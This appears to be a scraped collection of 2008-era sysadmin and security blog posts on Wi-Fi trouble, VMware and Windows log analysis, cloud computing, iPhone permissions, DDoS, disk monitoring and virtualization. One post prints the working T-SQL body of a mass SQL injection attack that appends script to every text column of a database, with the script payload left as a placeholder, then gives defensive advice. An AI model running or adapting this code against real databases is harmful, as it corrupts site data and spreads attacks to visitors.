Niel M. Bornstein

AddThis Social Bookmark Button

Earlier this year, without any logical reason, the wireless on my wife’s MacBook went flaky.

We had been using it for over a year with no problems whatsoever, but after installing new recessed lighting in my kitchen, the MacBook now has intermittent problems getting a signal from the the Linksys WRT54G router in the basement. No other laptops have any problem connecting, and the MacBook has no problem connecting to other wireless networks.

I used to be a Mac pro, but my Mac OS X chops are a little flabby. I’ve examined the logs to see if there is some explanation for this problem, but I can’t figure it out. There are basically two or three areas of the house where I am more or less guaranteed to receive a signal; the rest of the house is a big, intermittent dead zone.

Niel M. Bornstein

AddThis Social Bookmark Button

Call me naive, but I still enjoy traveling. Maybe it’s because I have not been seriously affected by delays or cancellations (pace my trips to Kelowna), but there’s still little I like better than getting on a plane and going somewhere new. Especially when, as is true now, it’s been a number of weeks since I’ve been out of town.

This week it’s New York City for two nights. I’ll be manning the Novell booth at Interop New York on Wednesday and Thursday, and I will be taking time to meet up with friends who are attending the O’Reilly Web 2.0 conference next door.

Come by and say hello at booth 439 if you’re coming to Interop, or give me a shout if you’re in town and want to meet up.

Anton Chuvakin

AddThis Social Bookmark Button

Following the new “tradition” of posting a security tip of the week (mentioned here, here ; SANS jumped in as well), I decided to follow along and join the initiative. One of the bloggers called it “pay it forward” to the community.

So, Anton Security Tip of the Day #16: Virtually Screwed - Journey Into VMWare ESX Log Analysis

CISecurty guide for VMWare (here) and DISA STIG for virtual machines (here) both mandate collection and analysis of VM platform logs; none goes into enough details on what to look for in logs. Let’s try to shed some light on security-focused log analysis of VMWare ESX v. 3.x logs.

First, at least until ESXi becomes the default choice, one needs to keep in mind that ESX as “Linux-inside” and thus diving into /var/log will not reveal any “alien technology” (well, not much :-)). However, one of the most useful logs is /var/log/hostd.N which is not a descendant of Linux standard logs. Extensive VM event records are written into this file.

Let’s focus on various types of logins to the ESX platform and identify logs that indicate a successful and failed attempts to log in. Here are a few useful examples to analyze:

Successful logins:

  • May 30 09:20:42 esx2 su(pam_unix)[9405]: session opened for user root by jhonny(uid=1626)

This is a classic Linux root login message; you can watch for these by searching VMWare ESX logs for “session AND opened AND user AND root.” Notice the user name of the user who switched to root.

  • May 30 09:20:34 esx2 sshd(pam_unix)[9364]: session opened for user jhonny by (uid=0)

This is also a classic Linux message for a normal (non-root) user login.

  • [2008-05-25 06:57:48.774 ‘ha-eventmgr’ 111639472 info] Event 40645 : User jhonny@1.1.1.1 logged in

This is a VMWare -specific application login to ESX. You can track such events by username, by event ID or by keywords “event AND logged AND user” (if you are using search)

Failed logins:

  • May 30 09:20:31 esx2 sshd[9356]: Failed password for jhonny from 1.1.1.1 port 54773 ssh2

Another classic Linux message from the ESX system; a failure to login due to incorrect password.

  • May 27 12:06:59 esx2 sshd[4756]: Failed password for illegal user jonny from 1.1.1.1 port 30594 ssh2

A message indicating a failure to login due to incorrect username (note a typo).

  • May 25 07:03:48 esx1 sudo: jhonny : 3 incorrect password attempts ; TTY=pts/0 ; PWD=/var/log ; USER=root ; COMMAND=/bin/bash

This ESX Linux platform message should also be familiar to Linux/Unix admins: it indicates multiple sudo password failures; look for such messages in the logs.

BTW, do you need to be reminded to track NOT only failed, but also successful login events?!

Overall, you must prepare for the future by learning to analyze VMWare logs, just like you handled “legacy OS”, such as Linux/Unix and Windows.

As I said before, I am tagging all the tips on my del.icio.us feed; here is the link: All Security Tips of the Day.

Technorati tags: , , ,

Anton Chuvakin

AddThis Social Bookmark Button

My next logging poll is out - with it I set out to figure out the old mystery of mine, why people don’t protect their log data (e.g. see this lamentation “Top 11 Reasons to Secure and Protect Your Logs“)

Vote away! As always, results will be posted.

Past polls and analysis are all here. Enjoy!

Brian K. Jones

AddThis Social Bookmark Button

I had a really fantastic time at OSCON this year. When I went to OSCON in 2006, I was a little put off by the fact that there seemed to be very little focus on systems administration, and meanwhile systems administrators are responsible for huge swaths of open source software growth in businesses large and small. I’m happy to report that this year’s OSCON had quite a bit of focus on topics of interest to systems folks, including myself. Thanks, ORA!

But on the 5-day flight back to the east coast (ok, maybe it just felt like 5 days), I had a chance to think more about what I had seen and heard. I had a lot of conversations, mostly with developers, about cloud computing initiatives like AppEngine, Amazone Web Services, BigTable, and the like. My take on this is that Amazon and Google are providing developer-centric interfaces to help them solve traditional systems administration problems…. and they appear to be doing it with some success.

So one might ask… “where does this leave the lowly sysadmin?”

It leaves you in an extremely fast-paced, ever-changing technological landscape with a set of needs, tools, and technologies that never stop evolving, and cause a lot of perceived community fragmentation while everyone scrambles to figure out which direction is “the way to go”. Sound familiar? It should. It’s exactly where you’ve been for your entire career. Some would say it’s the fact that things never seem to stagnate that makes them love system administration in the first place!

What I view as being pretty exciting (and I hope this continues - call me a blasphemer) is that, because of these developer-centric systems interfaces, there’s a bit of a forced convergence: developers have no choice but to have some understanding of what’s happening under the hood, because they’re going to have to write tools to essentially “rope in the cloud” — to manage all of this stuff. On the other hand, systems administrators would probably do well to take this opportunity to do more interesting stuff with code than the typical pushing out of account information, watchdog scripts, custom log parsers, system tool wrappers, and the like.

It’s a great time to pick up a new language, too, if you have an interest. Lots of sysadmins have picked up Ruby and/or Python as a means of broadening their horizons. If you use and like Perl, there’s no reason you can’t use it, but seeing what the hubbub is about surrounding newer stuff that looks like it’s more than a fad by now can’t hurt. I personally chose Python as my primary language because I never liked Perl, and Ruby *looks* like Perl to me (though I still dabble with it just to be famiiliar). If you *like* Perl, check out Ruby. If you only use Perl because you have to, give Python a shot! There are client libraries for a lot of these new services available in Ruby, Python, Perl, and PHP.

Dive into the cloud! The water’s fine!

Chris Josephes

AddThis Social Bookmark Button

I’ve been seeing this SQL Server code running wild for the past few days:

DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' + @T + '] set [' + @C + '] =
rtrim(convert(varchar,[' + @C + ']))+
''Explot JavaScript goes here'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

Actually, the insertion of this code into web servers happens from a DECLARE statement that encodes the entire payload in hexadecimal characters, which is then helpfully translated into exploit code by your own database server. In a way, your SQL Server database hacks itself.

It’s been around since January, but the payloads have been different. Either multiple people are using the exploit, or the exploits are modified on a per-hire basis and delivered through the same bot network. One hacker with a client hack pays some other hacker with a server hack, and they go to town. The process attacks hundreds of insecure websites, which in turn attacks thousands of client hosts.

The interesting thing is that this code doesn’t really have a catchy name like all of the other exploits. Server exploits never get much attention in the media compared to viruses that attack millions of workstations at once, like Nimda, Melissa, or others.

DBA1: “Hey, did you hear that one website got compromised by ‘Column Smasher’?”

DBA2: “No, I thought it was called ‘Lemon Pledge’.”

DBA1: “Why would a database exploit be called ‘Lemon Pledge’?”

DBA2: “Because it cleans everything from your tables.”

There have been a few reports of these attacks hitting Cold Fusion servers. Thanks to Google and the .cfm file extension, it isn’t too hard to find a Cold Fusion server out there. And if someone is using Cold Fusion, they’re probably just coding in CFML, which isn’t a very robust language.

Remember FormMail? Formmail was that horrible CGI script that everyone abused to send out spam. Well, it seems like people haven’t taken the hint. All that information passed from a web client to the server through a GET or POST method should be considered dangerous. Web page constraints, JavaScript/AJAX validators, and hidden form fields can’t protect your database. Depending on how your web forms and server applications are written, you’re allowing outside input from unknown sources to be inserted into the middle of your humble SQL statement. The most important firewall to protect your database is your server side application.

Here’s a few things you can do to protect your database from SQL injection attacks. Suggestions 1 through 3 range from low level sanitation to high level extreme SQL programming. Suggestion 4 is geared more towards administrative efforts for a Database Administrator to protect their system from a web developers badly programmed application.

1. Sanitize the input. Run regular expresison filters that will ideally work on a pattern of allowed characters, Accept only alphabetical characters and numerals, but strip everything else out.

2. Use SQL bind variables to contain web application input, after it’s been filtered.

3. Using stored procedures can give you the benefit of limiting what statements your web application can execute on the database server. Keep in mind that stored procedures are still pretty complex, and unless they’re coded properly, they may not add additional security from the application.

4. Block select privileges to the sysobjects and other system tables. And just because you’re not running SQL Server, don’t assume you’re in the clear. Check with your DB vendor to see specific instructions on how your server handles the Information Schema portion of the SQL-92 standard.

Chris Josephes

AddThis Social Bookmark Button

“(Twitteriffic/Urban Spoon/Where) would like to use your current location”

Once I select “Ok” two times while running the program, the iPhone no longer asks; it assumes the program has carte-blanche to know my location. I haven’t been prompted for any other security issues yet, but I’ve only used about six or seven applications so far.

Granting privilege escalation on an application by application basis is good, but I’d like to make a couple of recommendation for the next release of the iPhone OS.

1. From the “Settings” application, give me a master list of all installed applications, so I can say in advance whether an app can have, cannot have, or must always ask for the privilege it is requesting.

2. Clearly identify that the OS is prompting for privilege escalation, and not the application itself.

3. Create more privileges. For example, Twitteriffic needs permission to know where I am; but MyStreets doesn’t need permission to read and sort all of the contacts on my phone. And with VoiceRecord, I was never prompted for permission for the application to listen to my microphone. That would suggest that any application could just read the contact info or use the microphone at any time. Maybe I’m wrong, or maybe Apple’s application screeners check this out beforehand.

Chris Josephes

AddThis Social Bookmark Button

I came, I saw, I conquered, and somehow, I also managed to activate my new 3G iPhone. And I seem to be the only guy I know in my area that has made it past that final step.

Early this morning, Two co-workers, assorted friends, and myself, found each other at different points in the line. The following is a transcript of the events, recreated from SMS messages and Twitter posts

6:00 Woke up late.
6:41 (incoming SMS from Clay) Where are you?
6:42 (reply to Clay) Sorry, woke up late. ETA to MoA = 12 minutes
6:55 (to Clay) Fyckinf light rail car blocking mall entrance!
6:56 (reply from Clay) LOL!
7:00 Parked at west entrance, standing in line.
7:20 I download an app to my old EDGE phone to pass the time.
7:35 I can’t believe she cut in front of me and 8 other people. Is she married to that guy?
7:55 Curtains are down
8:00 Line’s moving
8:03 People cheer and applaud at the first sale. (this is starting to make my cynical)
8:30 In store
8:35 With personal concierge. Handled upgrade of At&t account.
8:40 Sign-in to iTunes failed.
8:45 Bought hard plastic case from Contour Design. Unlike the old metal phone, the plastic case could never look badass.
8:47 Heading in to the office
8:50 Neither phone works. EDGE unavailable on old phone, but Wi-fi works on both phones.
9:03 Try plugging new phone into PC, and running iTunes. No joy.
9:39 Receive SMS page from At&t.
10:13 Receive second SMS page from At&t. Unexpected incoming call arrives.
10:14 Confirmed that phone is working.

My activation process never was fully completed, but it seems to work. This was my first time camping for an Apple product, so I’ll give the experience a 6 on a scale of 1-10 for excitement. The store purchase flow was smooth (despite the iTunes unresponsiveness), employees were helpful and friendly, and they managed to handle the crowd pretty quickly.

New York and the East Coast had a one hour advantage over us mid-westerners, so there was already a strain on the sale process by the time we were let in. I’m guessing if you are currently holding a brick, it’ll either self activate, or you’ll have better luck with iTunes this afternoon.

Robert Hansen

AddThis Social Bookmark Button

Thwarting DDoS attacks is good for tier 1 content providers - and not for the reason you’re probably thinking. I was recently talking with someone who recently ejected from the content provider world, and he told me an interesting story about how peering relationships are actually impacted by DDoS (distributed denial of service) attacks. Let’s say for a moment that you’re providing hosting for some of the largest companies in the world. Chances are you are pushing a lot more packets out to users on the Internet than you are receiving.

It turns out that tier 1 peering agreements are set up in such a way that they want it to be as close to a 1 to 1 relationship as possible in terms of ingress and egress packets. If you as a content provider slip too far below a certain threshold you can get re-negotiated to a tier 2 or tier 3 status, giving you far worse rates, worse service level agreements and less quality of service. But the problem is if you are a content provider, you generally receive about 1K of data inbound and push out dozens or hundreds of packets on the outbound for each request. Hardly a 1 to 1! Kiss your tier 1 status goodbye!

So in comes a DDoS attack. Generally speaking DDoS attacks try to consume bandwidth or system resources. In either case generally they create a great deal of outbound packets as the systems try to respond to the DDoS attack. This would make the ratio of inbound to outbound packets worse if left unchecked, let alone the other more obvious negatives for your consumers in not being able to reach your sites!

Off you go to find yourself an anti-DDoS vendor to fit your needs and after implementing them you suddenly realize you are now no longer responding to the DDoS attack with packets from your side. Instead the ratio of packets becomes closer to equilibrium - as many inbound packets as outbound. Your inbound packets are a mix of good and bad traffic, of course, but maintaining that tier 1 relationship is key for many large content providers, so that same DDoS attack (and thwarting it) became a huge business asset suddenly.

Now, that leads us to the next obvious leap of logic - where any inbound automated traffic that can be blocked might be worth blocking, to a point, so that your levels of inbound and outbound traffic are stabilized. Web application firewalls fit into that mold, where they are able to send significantly less traffic if they block traffic that is not destined to a real person. Blocking the spiders and robots that won’t affect your marketing efforts with the search engines seems like an easy way to solve some of the massive outbound packet issues that cause content providers so much pain with their peering agreements.

Clearly the benefits are visible to anyone who penny pinches regarding their bandwidth bills, but this was an interesting new take on how to justify the cost of your security devices, if you needed another bullet in your justification to your boss.

Anton Chuvakin

AddThis Social Bookmark Button

Following the new “tradition” of posting a security tip of the week (mentioned here, here ; SANS jumped in as well), I decided to follow along and join the initiative. One of the bloggers called it “pay it forward” to the community.

So, Anton Logging Tip of the Day #15: Fear and Loathing in Event 567

This tip digs into a seemingly simple, but really VERY esoteric subject: monitoring file access and modification via a Windows event log. Now, some people - who never studied this subject - tend to have a very simplistic view of this: just enable Object Access auditing, then right-click on a file or directory, click Security->Advanced->Auditing and then pick what types of events will be logged and by what accessing entities (i.e. users or computers). OK, so this will produce some logs, that is for sure. But are they useful?

First, why are we doing this? We typically need to know the following when we audit file access in Windows (or any other OS for that matter) for security (monitoring and investigation) or compliance:

  • Time/date
  • Computer where it happened
  • User who touched the file
  • Application he used to access the file
  • File name + location (directory, share, etc)
  • Type of access (read, write, create, delete, etc)
  • Status (i.e. success or failure)

Can we get this from the above logs? No.

What? No!?! Really?

Yes, really. We can get some of the above, some of the time, not all of the above, all of the time. Here is an example, we are looking at event ID 560 (picture) and then at an extract from its description field.

Event:

event_log-560_1

Description (selected field):

Object Server: Security

Object Type: File

Object Name: C:\0\TestBed\simple_text_file.txt

Image File Name: C:\WINDOWS\system32\notepad.exe

Primary User Name: Anton

Primary Domain: XXXXXX

Accesses: READ_CONTROL

SYNCHRONIZE

ReadData (or ListDirectory)

WriteData (or AddFile)

AppendData (or AddSubdirectory or CreatePipeInstance)

ReadEA

WriteEA

ReadAttributes

WriteAttributes

WTH is that? Well, we know that the user ‘Anton’ has successfully read? wrote? changed attributes? did something? with a file named “C:\0\TestBed\simple_text_file.txt” using a program named “C:\WINDOWS\system32\notepad.exe.” That’s the best we can get, in this case! We may try to look at event IDs 562 and 567, but this missing information (i.e. the exact action performed) will not be added.

BTW, there will be a few more dozen (sometime hundreds!) of the 560s, 562s and 567s produced - all from just opening the text file in a notepad. The above event is notable for having BOTH “notepad” and “simple_text_file.txt” in the same event; others will have either of the two.

Anything else gets in the way? Yes, lots! MS Office will write to all files, even just opened for reading (with no user modifications to the content whatsoever), which will screw up your log monitoring efforts. If the file is on a share, more information will be missing (e.g. username might be).

So, how to use Windows event logs for file access tracking?

  1. Enable logging (as described above)
  2. Pick events 560 (most useful) and 562, 567 (useful too)
  3. Look for fun filenames that might be touched by the users (have a list of files and users handy)
  4. Figure out what programs were used to access them (this is called “Image File Name” in “WinLogSpeak”)
  5. Ponder the ‘Accesses’ section of each event until your brain turns blue :-) or until you decide whether such access is authorized or not…

Overall, this is still very useful for file access monitoring, but the process is paaaaaainful.

BTW, I am tagging all the tips on my del.icio.us feed. Here is the link: All Security Tips of the Day.

Technorati tags: , , ,


Anton Chuvakin

AddThis Social Bookmark Button

UPDATE: analysis of this poll is posted here.

So, my next poll is up - and it is fun: Which of the types of information are most useful when trying to make sense of a log entry?

Vote here!

Past polls:

  • Poll #7 “What tools do you use for Windows Event Log collection?” (analysis)
  • Poll #6 “Which logs do you LOOK at?” (analysis)
  • Poll #5 “What are your top challenges with logs?” (analysis)
  • Poll #4 “Who looks at logs in your organization?” (analysis)
  • Poll #3 “What do you do with logs?” (analysis)
  • Poll #2 “Why collect logs?” (analysis)
  • Poll #1 “Which logs do you collect?” (analysis)

  • Chris Josephes

    AddThis Social Bookmark Button

    This doesn’t look good, right?

    home2-vol.gif

    Most open source monitoring tools do filesystem health checking by comparing the current percentage of used space against a set value. If it’s is 90% full, send out a warning page; if it’s 89%, send the all clear.

    Notice that I said filesystem, and not actual disk. A single disk that’s 90% full can be a bad thing, because there are fewer free blocks available for writing, which leads to longer write times and file fragmentation. Not all filesystems are restricted to a single disk: there may be a back-end RAID solution, or the filesystem may be a shared filesystem served over NFS.

    Unfortunately, you could be the receiver of flapping alert pages where a filesystem sits between 90% and 89%, but it still performs fine. Unlike a broken Ethernet cable, the resolution for a filesystem threshold may not be so easy. Sometimes there are files that can’t be deleted, or there may not be any additional storage to allocate. You may have a filesystem that sits at 91% full for months simply because a new disk shelf won’t arrive until the next budget cycle.

    Everything comes down to disk blocks, even SAN and NAS solutions. That brings back the concern regarding fragmentation and performance. But what if your filesystem is a read-only OS image? Or what if it turns out 10% equates to 500 gigabytes on a huge disk appliance? If the filesystem is never being written to, or if the amount of writes equates to 0.001% of the entire filesystem, then where’s the fire?

    What about the inverse? What if your filesystem never reaches 90% full? Can there still be problems?

    In the above graph, nobody would have been paged by Nagios or other tools, because the filesystem never reached 90%. For the past few months it averaged 40% full, shot up to 75%, and then went back down. A newly released application was behaving incorrectly, and the issue was caught by the programmer. The next morning he stealthily re-released the application and corrected the issue. Nobody in systems administration noticed until the graph was checked in relation to another issue. If the programming error was never discovered, the filesystem would have filled up, probably at the most inconvenient time possible for a systems administrator.

    I would like to recommend to people developing filesystem or disk monitoring solutions change their way of thinking about filesystem health. Hard limits on allocated space may still be required, but those warnings should be optional. Measuring fullness makes assumptions about block structure that may not be correct.

    At the same time, the monitoring system should compare the standard deviation for the filesystem percentage over the past 24 hours, and compare it to the standard deviation for the past hour. Actually, you’d probably want to compare the first 23 hours out of 24, grab that standard deviation, and compare it to the deviation of the last hour.

    If those two deviations aren’t close, then there could be radical changes made to your filesystem that need to be addressed. Maybe files are being added or deleted, either way, it may warrant an investigation. For large filesystems in the terrabyte/petabyte range, using the percentage value may not be granular enough, so you will need to work with the actual value of free kilobytes or blocks.

    I take it back. This isn’t a recommendation to monitoring developers, this is a challenge. The first major open source monitoring guy that puts this solution together will have my undivided attention.

    AddThis Social Bookmark Button

    When I first started using LVM I got bit by a few bugs. It’s all part of being an early adopter. As a result I never really used it on production hardware. It wasn’t until about 2 years ago that I gave it another look. In a similar manner I never really thought much of software raid beyond a novelty. Much of that has changed now and I use them both on a regular basis for a number of reasons.

    Chris Josephes

    AddThis Social Bookmark Button

    I’m working with a product that includes this disclaimer in their support documentation:

    “Virtual environments, such as VMWare (and others) are not recommended, and thus not supported.”

    I can almost see their point. It’d be pretty daunting to gauge a benchmark if a customer described the running host as “1/13th of two dual core processors, 3.1 gigs of memory, and a 27 gigabyte filesystem disk”. True, that’s a pretty extreme situation, but I wouldn’t doubt it if there was the occasional bad provisioning by virtual system installers.

    Anyone who implements virtualization is implicitly trusting the VM solution to do the right thing, and when we see the operating system up and running, we just assume everything works perfectly. But let’s be honest: almost every VM solution creates some overhead, so you’re missing out on a few resources. That loss shouldn’t amount to much, but it could mean a lot to an application. And while CPU and memory can be partitioned, device IO such as hard disks are a little sketchy.

    To the developers of the above unnamed application, I know it’s going to be a big hassle, but five years from now, you’re not going to be able to avoid virtualization. Instead of the blanket disclaimers, increase your virtualization knowledge base, and create more test suites. Find out what works, what doesn’t, and why. It’s still okay to set guidelines on usage, but a wholesale avoidance of virtualization will hurt in the long run.

    Chris Josephes

    AddThis Social Bookmark Button

    Last week I attended a virtualization seminar. I did not expect a lot from the event at first, but I was surprised by the qualities of the guest speakers. Both had strong backgrounds with VM environments, and they did a good job of explaining what it takes to migrate to VM.

    One of the speakers made an interesting statement, saying that the hypervisor is now commoditized. The market for virtual solutions has gotten so big, it’s unavoidable. VMWare has ESX, Xen has their system, and Microsoft is coming out with Hyper-V. If everybody offers what is essentially the same thing, then how do these products stand out from one another?

    Now your incentives for buying virtualization have changed. You don’t buy VMWare just because it offers virtualization; you buy VMWare because it has the best service, and the best hot migration features. You might buy Hyper-V because your familiar with Microsoft internal APIs and management tools. On top of virtualization, I’m not sure what else Xen has to offer, but there could be new features coming out from Citrix.

    When I left the seminar, I started to re-evaluate hardware decisions that were made in the past. The nature of the beast has changed. Eight years ago, hardware decisions were taken for granted, because it too, was commoditized.

    Everything runs on an x86, and everyone makes an x86, so the low price usually won out. Anything that the vendor offers on top of the low price might have clinched the deal. Better support, better service, free shipping? Whatever it took to sell a server and get it out the door. Hundreds of IT departments packed data centers full of tight 1ru servers. Virtualization has now made those servers worthless.

    When a single server failed, it was no big deal. You probably had another one just like it running the same application. If that same server is now running multiple virtual hosts, then the service impact is higher. Two machines may now be fighting for access to the same mirrored local disks. What are the chances that they’re impacting each other?

    If your server can only handle 2 running virtual hosts, then you cut hardware costs by 50%; but in order to win, your hardware savings still need to be higher than the support and licensing costs of your enterprise VM solution. A 2 to 1 hardware savings ratio isn’t good. it’s expected. In order to maximize your investment, you should aim for a 4 to 1 hardware savings ratio, maybe higher

    Migrating to a VM environment does not mean building a VM solution into your servers; it means building your servers around a VM solution. If the hypervisor really is treated like a commodity, then the same can no longer be said about the hardware.